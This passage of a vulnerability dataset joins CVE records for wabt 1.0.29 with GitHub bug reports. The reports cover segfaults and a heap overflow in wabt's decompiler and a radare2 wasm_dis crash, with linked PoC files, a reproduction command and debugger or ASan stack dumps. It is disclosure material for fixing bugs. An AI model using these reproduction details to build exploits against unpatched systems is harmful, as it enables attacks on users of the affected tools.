0x7fffffffcb68 โ€”โ–ธ 0x7ffff6df4574 (wasm_dis+4394) โ—‚โ€” mov rdx, rax 05:0028โ”‚ 0x7fffffffcb70 โ—‚โ€” 0x0 06:0030โ”‚ 0x7fffffffcb78 โ€”โ–ธ 0x7ffff7d95b80 (main_arena) โ—‚โ€” 0x0 07:0038โ”‚ 0x7fffffffcb80 โ€”โ–ธ 0x555555782140 โ—‚โ€” ' dd ' โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ BACKTRACE ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ–บ f 0 0x7ffff7d316e5 __strlen_avx2+21 f 1 0x7ffff7c48383 strdup+19 f 2 0x7ffff6df4574 wasm_dis+4394 f 3 0x7ffff6df5906 wasm_decode+180 f 4 0x7ffff6da22dd r_arch_decode+136 f 5 0x7ffff64ed2e1 r_anal_op+580 f 6 0x7ffff7827c22 r_core_print_disasm+2478 f 7 0x7ffff7772b54 cmd_print+15553 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ pwndbg> bt #0 __strlen_avx2 () at ../sysdeps/x86_64/multiarch/strlen-avx2.S:65 #1 0x00007ffff7c48383 in __GI___strdup (s=0x0) at strdup.c:41 #2 0x00007ffff6df4574 in wasm_dis (op=0x7fffffffcce0, buf=0x555555680630 "\375\240\001\375d\v", buf_len=249, txt=true) at p/wasm/wasm.c:1112 #3 0x00007ffff6df5906 in wasm_decode (s=0x555555677b10, op=0x555555781c10, mask=R_ARCH_OP_MASK_ALL) at p/wasm/plugin.c:366 #4 0x00007ffff6da22dd in r_arch_decode (a=0x55555559a320, op=0x555555781c10, mask=31) at arch.c:225 #5 0x00007ffff64ed2e1 in r_anal_op (anal=0x55555559c910, op=0x555555781c10, addr=197, data=0x555555559937 "\375\240\001\375d\v", len=249, mask=R_ARCH_OP_MASK_ALL) at op.c:113 #6 0x00007ffff7827c22 in r_core_print_disasm (core=0x7ffff5dea010, addr=190, buf=0x555555559930 "A\205\376\377w\375\017\375\240\001\375d\v", len=256, count=64, pdu_condition_type=pdu_instruction, pdu_condition=0x0, count_bytes=false, json=false, pj=0x0, pdf=0x0) at disasm.c:5727 #7 0x00007ffff7772b54 in cmd_print (data=0x7ffff5dea010, input=0x55555574ff61 "d") at cmd_print.c:6708 #8 0x00007ffff77ef9dc in r_cmd_call (cmd=0x5555555e6ff0, input=0x55555574ff60 "pd") at cmd_api.c:520 #9 0x00007ffff778ca90 in r_core_cmd_subst_i (core=0x7ffff5dea010, cmd=0x55555574ff60 "pd", colon=0x0, tmpseek=0x7fffffffe114) at cmd.c:4930 #10 0x00007ffff77882cb in r_core_cmd_subst (core=0x7ffff5dea010, cmd=0x55555574ff60 "pd") at cmd.c:3760 #11 0x00007ffff778fcd2 in run_cmd_depth (core=0x7ffff5dea010, cmd=0x55555574ef30 "pd") at cmd.c:5829 #12 0x00007ffff779017b in r_core_cmd (core=0x7ffff5dea010, cstr=0x55555574eef0 "pd", log=true) at cmd.c:5913 #13 0x00007ffff76ab199 in r_core_prompt_exec (r=0x7ffff5dea010) at core.c:3556 #14 0x00007ffff76aa6ea in r_core_prompt_loop (r=0x7ffff5dea010) at core.c:3374 #15 0x00007ffff7dc7c9f in r_main_radare2 (argc=2, argv=0x7fffffffe6d8) at radare2.c:1700 #16 0x0000555555555638 in main (argc=2, argv=0x7fffffffe6d8) at radare2.c:104 #17 0x00007ffff7bcd083 in __libc_start_main (main=0x5555555555e0 <main>, argc=2, argv=0x7fffffffe6d8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe6c8) at ../csu/libc-start.c:308 #18 0x00005555555551ee in _start () ``` ## Credit Q1IQ(@Q1IQ)
Segmentation fault in wasm_dis at p/wasm/wasm.c:1112
https://api.github.com/repos/radareorg/radare2/issues/21363/comments
1
2023-02-20T11:48:06Z
2023-02-20T12:30:07Z
https://github.com/radareorg/radare2/issues/21363
1,591,704,755
21,363
4,825
CVE-2023-27115
2023-03-10T02:15:58.457
WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component wabt::cat_compute_size.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1938" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1938" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1992" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:webassembly:1.0.29:*:*:*:*:*:*:*", "matchCriteriaId": "E65BCD25-B1DD-43CE-9198-810D9F62B81C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/WebAssembly/wabt/issues/1938
[ "Exploit", "Issue Tracking" ]
github.com
[ "WebAssembly", "wabt" ]
### Environment ``` OS : Linux ubuntu 5.13.0-51-generic #58~20.04.1-Ubuntu SMP Tue Jun 14 11:29:12 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 57e6a58bfdd0babfd6f7fe401c9f2d8238ec3213 Version : 1.0.29 ``` ### Proof of concept [poc.wasm.zip](https://github.com/WebAssembly/wabt/files/8973781/poc.wasm.zip) ### Stack dump ./wasm-decompile --enable-all ./poc.wasm ``` pwndbg> r --enable-all ./poc.wasm Starting program: ./wasm-decompile --enable-all ./poc.wasm Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7f50234 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator std::basic_string_view<char, std::char_traits<char> >() const () from /lib/x86_64-linux-gnu/libstdc++.so.6 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ REGISTERS ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ RAX 0x4 RBX 0x6323e0 (__libc_csu_init) โ—‚โ€” endbr64 RCX 0x7fffffffbc98 โ—‚โ€” 0x4 RDX 0x63b2a7 โ—‚โ€” 0x6c652000207b2029 /* ') { ' */ RDI 0x0 RSI 0x63b1b1 โ—‚โ€” 0x7274705f007d20 /* ' }' */ R8 0x63b1b1 โ—‚โ€” 0x7274705f007d20 /* ' }' */ R9 0x63b1b1 โ—‚โ€” 0x7274705f007d20 /* ' }' */ R10 0x7fffffffc7a0 โ€”โ–ธ 0x7fffffffc7b0 โ€”โ–ธ 0x7fffffffc700 โ€”โ–ธ 0x7fffffffc720 โ€”โ–ธ 0x7fffffffc750 โ—‚โ€” ... R11 0x7fffffffceb8 โ—‚โ€” 0x0 R12 0x54fef0 (_start) โ—‚โ€” endbr64 R13 0x7fffffffdec0 โ—‚โ€” 0x3 R14 0x0 R15 0x0 RBP 0x7fffffffbc80 โ€”โ–ธ 0x7fffffffbcc0 โ€”โ–ธ 0x7fffffffbd10 โ€”โ–ธ 0x7fffffffbd60 โ€”โ–ธ 0x7fffffffbdc0 โ—‚โ€” ... RSP 0x7fffffffbc48 โ€”โ–ธ 0x5befc9 โ—‚โ€” mov qword ptr [rbp - 0x20], rax RIP 0x7ffff7f50234 โ—‚โ€” mov rdx, qword ptr [rdi] โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ DISASM ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ–บ 0x7ffff7f50234 mov rdx, qword ptr [rdi] 0x7ffff7f50237 mov rax, qword ptr [rdi + 8] 0x7ffff7f5023b ret 0x7ffff7f5023c nop dword ptr [rax] 0x7ffff7f50240 endbr64 0x7ffff7f50244 mov rax, qword ptr [rdi] 0x7ffff7f50247 ret 0x7ffff7f50248 nop dword ptr [rax + rax] 0x7ffff7f50250 endbr64 0x7ffff7f50254 push r12 0x7ffff7f50256 shl rsi, 2 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ STACK ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ 00:0000โ”‚ rsp 0x7fffffffbc48 โ€”โ–ธ 0x5befc9 โ—‚โ€” mov qword ptr [rbp - 0x20], rax 01:0008โ”‚ 0x7fffffffbc50 โ€”โ–ธ 0x7fffffffbc80 โ€”โ–ธ 0x7fffffffbcc0 โ€”โ–ธ 0x7fffffffbd10 โ€”โ–ธ 0x7fffffffbd60 โ—‚โ€” ... 02:0010โ”‚ 0x7fffffffbc58 โ€”โ–ธ 0x5514f1 โ—‚โ€” mov rcx, qword ptr [rbp - 0x18] 03:0018โ”‚ 0x7fffffffbc60 โ€”โ–ธ 0x719fb0 โ€”โ–ธ 0x71a000 โ€”โ–ธ 0x71a130 โ€”โ–ธ 0x71a0d0 โ—‚โ€” ... 04:0020โ”‚ 0x7fffffffbc68 โ€”โ–ธ 0x7fffffffbc98 โ—‚โ€” 0x4 05:0028โ”‚ 0x7fffffffbc70 โ€”โ–ธ 0x63b1b1 โ—‚โ€” 0x7274705f007d20 /* ' }' */ 06:0030โ”‚ 0x7fffffffbc78 โ—‚โ€” 0x0 07:0038โ”‚ rbp 0x7fffffffbc80 โ€”โ–ธ 0x7fffffffbcc0 โ€”โ–ธ 0x7fffffffbd10 โ€”โ–ธ 0x7fffffffbd60 โ€”โ–ธ 0x7fffffffbdc0 โ—‚โ€” ... โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€[ BACKTRACE ]โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ โ–บ f 0 0x7ffff7f50234 f 1 0x5befc9 f 2 0x5bef9b f 3 0x5bef47 f 4 0x5bee9b f 5 0x5ba4e0 f 6 0x5a9325 f 7 0x5a4b56 wabt::Decompiler::Decompile[abi:cxx11]()+3622 โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ pwndbg> bt #0 0x00007ffff7f50234 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >::operator std::basic_string_view<char, std::char_traits<char> >() const () from /lib/x86_64-linux-gnu/libstdc++.so.6 #1 0x00000000005befc9 in unsigned long wabt::cat_compute_size<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [3]>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [3]) () #2 0x00000000005bef9b in unsigned long wabt::cat_compute_size<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [3]) () #3 0x00000000005bef47 in unsigned long wabt::cat_compute_size<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [3]>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [3]) () #4 0x00000000005bee9b in unsigned long wabt::cat_compute_size<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [3]) () #5 0x00000000005ba4e0 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > wabt::cat<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&, char const (&) [3]) () #6 0x00000000005a9325 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) () #7 0x00000000005a4b56 in wabt::Decompiler::Decompile[abi:cxx11]() () #8 0x00000000005a33b5 in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) () #9 0x0000000000550432 in ProgramMain(int, char**) () #10 0x0000000000550752 in main () #11 0x00007ffff7a92083 in __libc_start_main (main=0x550730 <main>, argc=3, argv=0x7fffffffdec8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffdeb8) at ../csu/libc-start.c:308 #12 0x000000000054ff1e in _start () ``` ### Credit P1umer(@P1umer) Q1IQ(@Q1IQ)
Segmentation fault in wabt::cat_compute_size
https://api.github.com/repos/WebAssembly/wabt/issues/1938/comments
1
2022-06-24T06:43:25Z
2023-03-17T11:32:55Z
https://github.com/WebAssembly/wabt/issues/1938
1,283,331,255
1,938
4,826
CVE-2023-27115
2023-03-10T02:15:58.457
WebAssembly v1.0.29 was discovered to contain a segmentation fault via the component wabt::cat_compute_size.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1938" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1992" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1938" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1992" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:webassembly:1.0.29:*:*:*:*:*:*:*", "matchCriteriaId": "E65BCD25-B1DD-43CE-9198-810D9F62B81C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "665" ]
665
https://github.com/WebAssembly/wabt/issues/1992
[ "Exploit", "Issue Tracking" ]
github.com
[ "WebAssembly", "wabt" ]
### Environment ``` OS : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 3054d61f703d609995798f872fc86b462617c294 Version : 1.0.29 Build : make clang-debug-asan ``` ### Proof of concept [poc-5.wasm.zip](https://github.com/WebAssembly/wabt/files/9490262/poc-5.wasm.zip) ### Stack dump ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1681910==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f858ec47234 bp 0x7ffce2314ff0 sp 0x7ffce2314ef8 T0) ==1681910==The signal is caused by a READ memory access. ==1681910==Hint: address points to the zero page. #0 0x7f858ec47234 in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>::operator std::basic_string_view<char, std::char_traits<char>>() const (/lib/x86_64-linux-gnu/libstdc++.so.6+0x186234) #1 0x61d4eb in unsigned long wabt::cat_compute_size<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:27 #2 0x61d39d in unsigned long wabt::cat_compute_size<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:39 #3 0x61d235 in unsigned long wabt::cat_compute_size<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:39 #4 0x61d005 in unsigned long wabt::cat_compute_size<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:68:39 #5 0x60f57f in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> wabt::cat<char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>, char [3]>(char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [5], std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>> const&, char const (&) [3]) /wabt/out/clang/Debug/asan/../../../../src/string-util.h:75:13 #6 0x5d137d in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:530:20 #7 0x5ccb59 in wabt::Decompiler::DecompileExpr(wabt::Node const&, wabt::Node const*) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:357:22 #8 0x5c30b4 in wabt::Decompiler::Decompile[abi:cxx11]() /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:825:20 #9 0x5be6bd in wabt::Decompile[abi:cxx11](wabt::Module const&, wabt::DecompileOptions const&) /wabt/out/clang/Debug/asan/../../../../src/decompiler.cc:854:21 #10 0x4f16bd in ProgramMain(int, char**) /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:103:18 #11 0x4f2101 in main /wabt/out/clang/Debug/asan/../../../../src/tools/wasm-decompile.cc:116:10 #12 0x7f858e754082 in __libc_start_main /build/glibc-SzIz7B/glibc-2.31/csu/../csu/libc-start.c:308:16 #13 0x43f04d in _start (/wabt/out/clang/Debug/asan/wasm-decompile+0x43f04d) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libstdc++.so.6+0x186234) in std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char>>::operator std::basic_string_view<char, std::char_traits<char>>() const ==1681910==ABORTING ```
SEGV in wabt::cat_compute_size
https://api.github.com/repos/WebAssembly/wabt/issues/1992/comments
1
2022-09-05T13:44:45Z
2022-09-05T13:49:27Z
https://github.com/WebAssembly/wabt/issues/1992
1,362,003,678
1,992
4,827
CVE-2023-27117
2023-03-10T02:15:58.553
WebAssembly v1.0.29 was discovered to contain a heap overflow via the component component wabt::Node::operator.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1989" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/WebAssembly/wabt/issues/1989" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:webassembly:1.0.29:*:*:*:*:*:*:*", "matchCriteriaId": "E65BCD25-B1DD-43CE-9198-810D9F62B81C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/WebAssembly/wabt/issues/1989
[ "Exploit", "Issue Tracking" ]
github.com
[ "WebAssembly", "wabt" ]
### Environment ``` OS : Linux ubuntu 5.15.0-46-generic #49~20.04.1-Ubuntu SMP Thu Aug 4 19:15:44 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux Commit : 3054d61f703d609995798f872fc86b462617c294 Version : 1.0.29 Build : make clang-debug-asan ``` ### Proof of concept [poc-2.wasm.zip](https://github.com/WebAssembly/wabt/files/9490159/poc-2.wasm.zip) ### Stack dump ``` ================================================================= ==1704949==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x610000000010 at pc 0x0000005f2828 bp 0x7ffc769a3c60 sp 0x7ffc769a3c58 READ of size 4 at 0x610000000010 thread T0 #0 0x5f2827 in wabt::Node::operator=(wabt::Node&&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:67:17 #1 0x5dc955 in wabt::Node::Node(wabt::Node&&) /wabt/out/clang/Debug/asan/../../../../src/decompiler-ast.h:65:28 #2 0x5f54b0 in std::enable_if<__and_<std::__not_<std::__is_tuple_like<wabt::Node>>, 